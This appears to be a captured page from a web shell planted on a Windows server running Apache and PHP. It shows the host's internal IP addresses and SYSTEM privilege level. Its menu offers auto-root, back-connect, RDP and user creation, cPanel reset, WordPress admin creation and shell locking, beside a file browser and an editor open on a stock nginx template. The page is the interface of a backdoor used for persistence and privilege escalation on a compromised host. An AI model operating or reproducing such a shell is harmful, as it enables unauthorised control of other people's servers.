Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
laragon /
tpl /
[ HOME SHELL ]
Name
Size
Permission
Action
MariaDB.my.ini.manifest.tpl
611
B
-rw-rw-rw-
MySQL.my.ini.manifest.tpl
408
B
-rw-rw-rw-
Procfile.manifest
840
B
-rw-rw-rw-
VirtualHost.SSL.manifest.tpl
651
B
-rw-rw-rw-
VirtualHost.manifest.tpl
328
B
-rw-rw-rw-
mongod.conf.manifest.tpl
772
B
-rw-rw-rw-
nginx.conf.manifest.tpl
901
B
-rw-rw-rw-
nginx.server.SSL.manifest.tpl
1.08
KB
-rw-rw-rw-
nginx.server.manifest.tpl
829
B
-rw-rw-rw-
nginx.sites-enabled.00-default...
1.12
KB
-rw-rw-rw-
nginx.sites-enabled.00-default...
764
B
-rw-rw-rw-
openssl.conf.tpl
374
B
-rw-rw-rw-
pip.bat.manifest
122
B
-rw-rw-rw-
stop-mongod.bat
57
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nginx.sites-enabled.00-default.manifest.tpl
server { listen <<PORT>> default_server; server_name localhost ; root "<<DOC_ROOT>>"; index index.html index.htm index.php; # Access Restrictions allow 127.0.0.1; deny all; include "<<LARAGON_ROOT>>/etc/nginx/alias/*.conf"; location / { try_files $uri $uri/ =404; autoindex on; } location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass php_upstream; #fastcgi_pass unix:/run/php/php7.0-fpm.sock; } charset utf-8; location = /favicon.ico { access_log off; log_not_found off; } location = /robots.txt { access_log off; log_not_found off; } location ~ /\.ht { deny all; } }
Close